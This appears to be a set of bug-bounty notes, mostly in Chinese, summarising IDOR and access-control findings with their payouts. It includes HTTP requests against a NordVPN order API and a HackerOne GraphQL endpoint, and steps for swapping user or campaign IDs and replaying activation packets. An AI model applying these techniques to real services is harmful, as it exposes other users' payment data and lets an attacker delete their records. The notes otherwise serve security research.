2023-09-18

IDOR to add secondary users in /users/api/v1/users

#idor

Step

1. PayPal企业帐户允许帐户所有者创建多个二级用户，并为其员工分配特定权限。

2. 使企业帐户所有者可以从其他帐户分配次要用户

3. 新的次要用户将被授予对登录的访问，从而允许对该单个用户登录的功能的未授权访问.

4. 10500$💵

IDOR allow access to payments data of any user

#idor

Step

1. 请求包

POST /api/v1/orders HTTP/1.1 
Host: join.nordvpn.com 
Accept: application/json 
Accept-Language: en-US,en;q=0.5 
Content-Type: application/json 
Content-Length: 179 
DNT: 1 
Connection: close

{  
    "payment":{  
        "provider_method_account":"6xdxdd",  
        "parameters":{  
  
        }  
    },  
    "action":"order",  
    "plan_id":653,  
    "user_id":20027039,  
    "tax_country_code":"TW",  
    "payment_retry":0,  
    "is_installment":false  
}

1. 响应体

{  
    "id":42615458,  
    "user_id":20027039,  
    "confirmation":{  
 
敏感信息


}
}

1. 更改请求包userid ，得到的响应体,泄露铭感数据

{  
    "id":42616142,  
    "user_id":89495247,  
    "confirmation":{  
        "id":23093800,  
别人的铭感信息
    }  
}

1. 1000$💵

Insecure Direct Object Reference (IDOR) - Delete Campaigns

#idor

Step

1. 请求包,关注点campaign_id

POST /graphql HTTP/2
Host: hackerone.com
Cookie: yourcookie
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{  
  "campaign_id":"Z2lkOi8vaGFja2Vyb25lL0NhbXBhaWduLzI0NA==",  
    },  
   

1. base64解码campaign_id ，得到gid://hackerone/Campaign/244

2. 更改数字 ，并编码放回包中 ，可更改删除其他公司项目

3. 50$💵

IDOR 功能点

#idor

Step

1. 更改私人视频的密码1,500$💵

2. 编辑其他视频数据，如标题和描述

3. 通过成功利用IDOR发布私人视频

4. 从图库中删除照片和相册1,500$💵

Access Control Bug

#idor

Step

1. 管理员下发会议开通包(一个包理论只有一次会议)给普通用户

2. 普通用户使用 包 开通会议时抓包

3. 无限重发此包 无限开会议

4. 500💵

IDOR

#idor

Step

1. A账户(A公司)创建一个消费请求，抓包，观察参数

2. B账户(B公司)也创建一个消费请求

3. 将A账户的公司id换成B账户的，消费请求随之变换

4. 1000💵